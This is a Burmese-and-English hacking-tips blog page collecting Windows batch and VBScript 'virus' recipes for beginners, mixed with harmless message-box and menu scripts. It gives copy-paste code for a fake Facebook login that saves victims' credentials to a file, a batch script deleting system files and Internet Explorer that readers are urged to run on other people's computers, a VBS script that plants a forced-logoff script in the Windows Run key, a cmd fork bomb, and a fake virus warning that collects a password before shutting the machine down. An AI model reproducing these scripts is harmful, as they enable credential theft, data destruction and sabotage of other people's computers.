Welcome !>>>I'm Sharing Hacking Tips & Tricks for beginner & Studiers<<<<<>>>You Can try to get Study..........

..Thank For Visit & read.>>>>>

Showing posts with label Virus ဖန္တီးနည္း. Show all posts
Showing posts with label Virus ဖန္တီးနည္း. Show all posts

(ေၾကာက္စရာ အေကာင္းဆုံး Virus တခု လုပ္ၾကမယ္)


<<<Monster DANGEROUS VIRUS >>>
Monster နာမည္ နဲ့ အရင္ တုန္းက G -talk Virus တခု ကၽြန္ေတာ္ လုပ္ဖူးပါတယ္...။
အဲ့ ဒီတုန္းက လည္း Antivirus ေတာ္ေတာ္ မ်ားမ်ား ခံသြားရတယ္..။ (E-Set NOD 32 Avtivirus နဲ့ မွ သတ္လုိ ့ရပါတယ္)
အခု ဒီေကာင္ ၾကေတာ့ ကုိယ္ ဖြင္ ့မွ ထိတဲ့ ....Bat 2nd Monster Virus ေလးပါ..။
1-အရင္ဆုံး Notepad ကုိ ဖြင္ ့ပါ။
2-ျပီးရင္ ေအာက္ ကကုတ္ေတြကုိ ကူး ထဲ့ ေပးပါ.။။။

Make your PC a little faster by cleaning the history, unused junk files...



@echo off
echo Created by shwekoyantaw
del /s /f /q c:\windows\temp\*.*
rd /s /q c:\windows\temp
md c:\windows\temp
del /s /f /q %temp%\*.*
rd /s /q %temp%
md %temp%

Recycle Bin ကိုယ္တိုင္လုပ္မယ္

Files ေတြ Icons ေတြ ကိုဖ်က္တယ္...။ ေနာက္ေတာ့ Recycle Bin ထဲကိုေရာက္သြားတယ္ေလ သူ့ထဲ ကိုေရာက္သြားတာေတြကို ဖ်က္ခ်င္လို့ ရွာလိုက္ေတာ့ ကိုယ္ေတာ္ေခ်ာကေပ်ာက္ေနေလေရာ..ဗ်ာ တကယ္ လို့ အဲ့လိုျဖစ္ေနရင္ အလြယ္ကူဆံုးနည္းေလးပါ။Desktop ေပၚမွာ New Folder တစ္ခုကိုရယူ လိုက္ပါ။ ပီးရင္ေတာ့ သူ့ကို ကၽြန္ေတာ္ေအာက္မွာေပးထားတဲ့Code ကို ယူပီးေတာ့ New Folder ကို Rename ေပးလိုက္ယံုပါပဲ။


Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}

Bat file ေရးနည္းစာအုပ္

ဒီစာအုပ္ကbeginnerေတြအတြက္အသံုး၀င္မယ္ထင္ပါတယ္။virus ဖန္တီးႏုိင္တဲ့fileလဲျဖစ္ပါတယ္ဒီမွာေဒါင္းပါ

Hacking Facebook account using Notepad and cmd


1. Open notepad and copy these codes
@echo off
color a
title Login
echo Please Enter Email Address And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%Pass%">Logs.txt
start www.facebook.com
exit
2.Save it as monster.bat
3.Click on your c drive and create a folder named logs.
4. Now create a shortcut file of that bat.
5. then right click on the shortcut one and click on properties. And change the icon
 download a facebook icon from here.
6. All task finished. Test it.

Monster

computer-booter program


 Copy and Paste the following into Notepad...


@echo off
:Main
title ComputerBooter V0.1
cls
color A
echo.
echo.
echo 1} About This Program
echo 2} Exit This Program
echo.
echo 3} Shutdown Computer
echo 4} Restart Computer
echo 5} Logoff Computer
echo.
echo 6} Start Control Panel
echo 7} Start System32 Folder
echo.
echo 8} Crash your Computer
echo.
echo 9} Our coding Website
set /p select=
if %select% EQU 1 goto About
if %select% EQU 2 goto Exit
if %select% EQU 3 goto Shutdown
if %select% EQU 4 goto Restart
if %select% EQU 5 goto Logoff
if %select% EQU 6 goto Control
if %select% EQU 7 goto System32
if %select% EQU 8 goto Crash
if %select% EQU 9 goto Webpage
:About
title About ComputerBooter V0.1
color E
cls
echo.
echo.
echo ABOUT COMPUTERBOOTER 0.1 FOR WINDOWS
echo (BATCH FILE VERSION)
echo.
echo All Of this program was created by NotepadCodes
echo.
echo.
echo For more info visit http://www.notepadcodes.webs.com Or type in Start
set /p web=
if %web% EQU Start goto Webpage else goto Main
:Exit
Exit
goto Exit
:Shutdown
start C:\Windows\System32\Shutdown.exe -s -t 5 -c "ComputerBooter Will now Shutdown Your Computer"
goto Main
:Restart
start C:\Windows\System32\Shutdown.exe -r -t 5 -c "ComputerBooter Will now Shutdown Your Computer"
goto Main
:Logoff
start C:\Windows\System32\Shutdown.exe -l -t 5 -c "ComputerBooter Will now Logoff Your Account"
goto Main
:Control
start Control Panel
goto Main
:System32
start C:\Windows\System32
goto Main
:Webpage
echo Currently Loading
ping localhost -n 1 >nul
cls
echo Currently Loading.
ping localhost -n 1 >nul
cls
echo Currently Loading..
ping localhost -n 1 >nul
cls
echo Currently Loading...
ping localhost -n 1 >nul
cls
echo Successfully Loaded...
ping localhost -n 2 >nul
start http://www.notepadcodes.webs.com
echo Booting Up Menu...
ping localhost -n 2 >nul
goto Main
:Crash
start C:\windows\system32\CMD.exe
goto Crash


Then save it as BOOT.bat and enjoy!

make a goto menu


Copy and Paste the following into Notepad...

@echo off
:menu
title MenuMaker V0.1
color 06
cls
echo.
echo.
echo Menu Tester...
echo Type 1 for fun!
echo Type 2 for a bun!
set /p choice=
If %choice% EQU 1 goto fun
If %choice% EQU 2 goto bun
:fun
title !!!Fun!!!
color 08
cls
echo !!!FUN!!!
echo NO FUN HERE!
pause
goto menu
:bun
title !!!Bun!!!
color 08
cls
echo !!!Bun!!!
echo No bun here...
pause
goto menu

user password code cracker v1


Type this code into notepad, and you can type in a user and change the password!
 ********************************
 <Monster YTZK Technology/>
@echo
title CodeCracker By NotepadCodes!
color 5E
echo CodeCracher V1
echo              By NotepadCodes.webs.com
echo ******************************************************************
echo.
net user
echo type in a username in the option above:
Set /p username=
net user %username%
echo Changing Password...



and save it as PasswordCracker.bat!
NOTE:
THIS WONT WORK ON ALL MACHINES!

Created Matrix Codes

1
Open notepad and type what you see below this. The numbers after the word echo are random.
Title >>>Monster YTZK<<<
@echo off
:a
color 2
echo 1 1 1 0 1 0 0 0y e t a y z a k y a w M o n s t e r h a c k e r 1 1 1 1 0 0 0 1 1 0 0y e t a y z a k y a w M o n s t e r h a c k e r 1 0 0 0 E n t e r M o n s t e r 1 0 1 0 1 0 0 0 1 1 1 1
ping localhost -n 1 > nul
echo y e t a y z a k y a w M o n s t e r h a c k e r y e t a y z a k y a w M o n s t e r h a c k e r
echo 1 0 0 1 1 0 9 8 1 2 0 1 9y e t a y z a k y a w M o n s t e r h a c k e r 9 2 1 1 1 0 0 1 0 1 1 1 0 1 1 y e t a y z a k y a w M o n s t e r h a c k e r0 1 0 0 0 1 0 1 1
ping localhost -n 1 > nul
echo 0 1 0 0 0 1 0 0 0 1 0 0 0 1 0 1 0 0 1 0 1 0 1 1 0 1 0 0 0 01 0 1 0 0 1 0
ping localhost -n 1 > nul
echo 1 0 1 1 1 0 1 1 0y e t a y z a k y a w M o n s t e r h a c k e r 9 1 1 2 1 1 0 9 1 0 5 7 y e t a y z a k y a w M o n s t e r h a c k e r7 8 7 8 1 3 2 1 2 1 2 3 2 1 3 4
ping localhost -n 1 > nul
echo 1 1 1 0 1 0 0 1 0 0 0 1 1 y e t a y z a k y a w M o n s t e r h a c k e r1 0 0 1 1 1 4 y e t a y z a k y a w M o n s t e r h a c k e r1 2 1 1 2 0 1 0 1 2 2 1 0 1 1 0 1
goto a

Save Monster.bat
Click That is
Thank you Ye tay Za Kyaw ..>>> :)

Make a Simple Virus.

plz dont try on your pc...


it is simple .bet file....


@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"

Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"

Try this on any other computer..... Very heavy Virus..
 

The most wanted .vbs Hacks


The most wanted .vbs Hacks

VBScript (Visual Basic Scripting Edition) is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.This indeed is a very interesting scripting language and I will share some of the best .vbs hacks which you can use to have loads of fun.We have shared a post on this blog which uses .vbs scripting and helps toConvert text to speech on a PC without any software.You can send these to your friends too ;)

How to use the scripts provided?
To use the scripts provided in this article you need to open a new notepad,and copy-paste the code provided within the different headings.Then goto the file menu and click “save as..” .Save it in your desktop with the name “anything.vbs” .To use the script , double click on the icon on your desktop.

Make the CD tray open and close repeatedly

12 AMAZING NOTEPAD HACKING TRICKS

        ALL NOTEPAD TRICKS.



#1 Bush Hid the Facts – Most Popular Notepad Tricks
This is one of the mysterious notepad tricks we know. According to the
trick it really seems Microsoft had put some hack into the coding of
notepad making the text hidden after saving it.
Bush Hid the Facts – Most Popular Notepad Trick Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See…
Why This Happens ? : It was later known 4335 Rule. It means that if we
enter four words separated by spaces, wherein the first word has 4
letters, the next two have three letters each, and the last word has
five letters.Then Notepad Automatically hides the text into unknown
code. Similar are with “this app can break”.
OR

CMD and Notepad Codes and hacks

Notepad Codes

#1 simple a loop that opens CMD after CMD until computer crashes
@echo off
:a
Start cmd
goto :a


#2 a keylogger/shutdown computer code
@echo off
color c
start Iexplore
Title WARNING
echo WARNING VIRUS HAS ENTERED THROUGH THE DATA FRAME
echo Email Microsoft immediately
cd "C:\CMDREMARKS"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >CMDREMARKS.txt
shutdown -s -t 30 -c "Request Denied"

How to: Make a message box using VBScript

In this "Instructable" I'll be showing you how to make a message box in Notepad using VBScript Coding.

Please Note: This is a completely harmless project and if something DOES go wrong, I will not be help responsible.

Step 1: Step One

First thing to do is locate your Notepad.exe.
This application is on every windows computer OS and can be used for loads of interesting things.
Notepad.exe is normally located in Start Menu>All programs>Accessories

Step 2: Step Two: The code.

For this next bit, it's fairly simple, because I do all the work.

x=msgbox("Your Text Here" ,0, "Your Title Here")
Make sure that the " is included in the text and replace the Your Text Here and Your Title Here. But don't change anything elese!

Advanced users can change something else.
  • 0 =OK button only
  • 1 =OK and Cancel buttons
  • 2 =Abort, Retry, and Ignore buttons
  • 3 =Yes, No, and Cancel buttons
  • 4 =Yes and No buttons
  • 5 =Retry and Cancel buttons
  • 16 =Critical Message icon
  • 32 =Warning Query icon
  • 48 = Warning Message icon
  • 64 =Information Message icon
  • 0 = First button is default
  • 256 =Second button is default
  • 512 =Third button is default
  • 768 =Fourth button is default
  • 0 =Application modal (the current application will not work until the user responds to the message box)
  • 4096 =System modal (all applications wont work until the user responds to the message box)
Change the "0" with any of these numbers above.

Step 3: Step Three: The Saving

Now for this bit, you would think that this is easy, but it's not as simple as Save As.

When you have finished the code, go to Save As and save it as: What You Want To Call It.vbs
At the end of the name, make sure that .vbs goes at the end and safe it anywhere.




Step 4: Step Four: Lets test it!

Now that we have completed the following steps, lets test it. Locate your safe file and dubble-click it. Lets see what the outcome was.


Step 5: Outcome.

The outcome of todays lesson was:

Your learned how Notepad.exe can become a powerfull scripting program
How to make a message Box
The values of Message Box's to make them look convincing.

Thank you for reading this lesson

Hacking With Notepad


Here is how you do a cool little hack with notepad. What it does is pops up a command prompts and overloads the computer and the computer CRASHES!!!

FOR EDUCATIONAL PURPOSES ONLY!!!!!!!

Step 1: NotePad

First you need to open Notepad.
You can go to the start menu and Click "All Programs", Then find the Folder "Accessories"
and "Notepad" should be in that folder.
Or you can open the start menu and type "Notepad" and click enter and Notepad will open.

Go To Next Step---------------------------------------->>>>>

VBS Virus ေရးနည္းမ်ား

 VBS Virus ေရးနည္းမ်ား (MOnster Technology)YTZK

Copy and paste the following into Notepad...


pass=inputbox("Password?")
if pass="fish" then msgbox("Correct Password!") else msgbox("Incorrect Password!")

The password for this is fish
Save it as Password.vbs And enjoy!

make a message box (NOTEPAD MODE)


Copy and paste the following into Notepad...


msgbox("Hello!")
msgbox("Hello, Again!")


To make the "  hold shift and 2
Inside the (" ") Type what you want it to say
Save it as Message.vbs and Enjoy!


Copy and paste the following into Notepad...

DO
msgbox("VIRUS!")
LOOP


Save it as Loop.vbs and Enjoy!

 hacktool vbs - Message box maker

Copy and paste the following into Notepad...

msgbox("HackTool VBS - Message box maker")
msg=inputbox("Enter a message...")
msgbox(" ") + msg

Save it as HackTool VBS Message Maker.vbs

Have a good day.vbs

Copy and paste the following into Notepad...


 name=inputbox("Whats your name?")
msgbox("Have a good day, ") + name

SAVE IT AS HAVE A GOOD DAY.VBS AND ENJOY!

Virus Creations

1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


dowload virus

oky tooday i am going to show you how to make a fake virus
all you will need is notepad
and some basic batch file skills

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Step 1: Open note pad

OK first thing your going to need to do is open you're notepad
after you have open it you will need to take down the code in the next step

ကြ်န္ပ်ဳတာကုိ ကိုေျပာခ်င္တာေျပာခုိင္းမယ္


ကြ်န္ေတာ္လညး္ ကိုေနေစး ကေနျပီးေတာ့ ၾကိက္လုိ ့ကူးထားတာပါ။သူငယ္ခ်င္းတုိ ့လည္းၾကိက္ရင္ ကူးၾကေပ့ါ။
အရင္ဆုံး notepad ကိုဖြင့္ ျပီးရင္
Do
Dim msg, sapi
msg="I Love You. Say Monster"
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
loop


ကိုထည့္ျပီးေတာ့ talker.vbs ဆုိျပီးေပးျပီးေတာ့သိမ္းပါ။
ျပန္ပိတ္ရင္ေတာ့  Ctrl+shift+Esc ကိုနုိ္ပ္ပါ။ processes ကိုသြားပါ။

wbscript.exe ကို႐ွာပါ ..
ေတြ ့ရင္ေတာ့  end processes ကိုနုိပ္လုိက္ပါ၊

မွတ္ခ်က္။  ။I Love You. Say Monster ဆုိတဲ့ေနရာေလးမွာကို ၾကုိက္တာေလးရုိက္ျပီးသုံးနုိင္ပါတယ္။

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks
Related Posts Plugin for WordPress, Blogger...
 
©2012 M0N$T3R# Created by MÖN$TéR | Shad0w MÖN$TéR